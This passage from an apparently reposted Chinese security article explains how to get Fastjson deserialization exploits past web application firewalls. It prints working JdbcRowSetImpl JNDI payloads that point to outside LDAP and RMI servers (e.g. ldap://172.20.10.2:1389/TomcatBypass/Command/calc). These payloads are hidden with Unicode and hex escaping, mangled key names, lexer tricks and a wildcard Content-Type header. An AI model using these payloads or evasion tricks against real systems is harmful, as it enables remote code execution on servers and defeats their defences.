    "\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065""\x6c\x64\x61\x70\x3a\x2f\x2f\x31\x37\x32\x2e\x32\x30\x2e\x31\x30\x2e\x32\x3a\x31\x33\x38\x39\x2f\x54\x6f\x6d\x63\x61\x74\x42\x79\x70\x61\x73\x73\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x2f\x63\x61\x6c\x63",
    "\x61\x75\x74\x6f\x43\x2d\x6f\x2d\x6d\x6d\x69\x74"true
  }

可以将编码进行混合使用

{
  "simw1r":{"\u0040t\u0079\u0070e":"java.lang.Class","val":"\x63om.s\x75\x6E\x2E\x72\u006F\u0077s\x65\x74\u002EJd\u0062\x63\u0052o\x77S\x65t\x49\x6D\u0070\u006C"},
  "5gwgkc":{{
      "\u0040t\u0079\u0070e": "com.alibaba.fastjson.JSONObject",
      "bcdqdl":
      {"\u0040t\u0079\u0070e":"\x63om.s\x75\x6E\x2E\x72\u006F\u0077s\x65\x74\u002EJd\u0062\x63\u0052o\x77S\x65t\x49\x6D\u0070\u006C","dataSourceName":"rmi://xxxx:xx/PQ5P8iBh/","autoCommit":true}
  }:{}}
}

Hex在线编码

Unicode在线编码

基于Fastjson智能匹配绕过

fastjson在映射javaBean时,找不到对应key时,会忽略大小写及-_,反序列化时会将忽略后的字符匹配对应的驼峰式命名的对象中。

{
  "rand1": {
    "@type""Lcom.sun.rowset.JdbcRowSetImpl;",
    "dat-aS-ourc-eName""ldap://172.20.10.2:1389/TomcatBypass/Command/calc",
    "aut_o_Commit"true
  }

同时,fastjson1.2.36版本及之后,可以混合使用-_

{
  "rand1": {
    "@type""Lcom.sun.rowset.JdbcRowSetImpl;",
    "dat-aS-ou_rc-eName""ldap://172.20.10.2:1389/TomcatBypass/Command/calc",
    "aut_o_Co_m_mit"true
  }

再次基础上也能叠加使用Unicode/Hex编码。

基于Fastjson词法分析器混淆绕过

  • 使用单引号替代双引号
  • 属性前添加多个,
  • 添加/*anythings*/在属性值间

修改Content-Type

某些Waf考虑到解析效率的问题,会根据Content-Type的内容进行针对性的拦截分析,例如值为appliction/xml时会进行XXE的检查,那么可以尝试将Content-Type设置为通配符“*/*来绕过相关的检查。针对Fastjson的检查,也同样可以用这种思路更改为Content-Type: */*,或是Content-Type: */*;charset=UTF-8

参考链接

fastjson到底做错了什么

Fastjson 反序列化漏洞史

Java安全之FastJson JdbcRowSetImpl 链分析

spring-boot-upload-file-lead-to-rce-tricks

浅谈fastjson waf Bypass思路

关于blackhat2021披露的fastjson1.2.68链

技术交流加下方vx


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg2NDY2MTQ1OQ==&mid=2247508649&idx=1&sn=0b1ccf9dc71a62e95327abb563b03b6c&chksm=ce671815f9109103778cd3b4e43ef0bdfa09ee4f282fe4f17ea07051c39d5572acd79a36dbb0#rd
如有侵权请联系:admin#unsafe.sh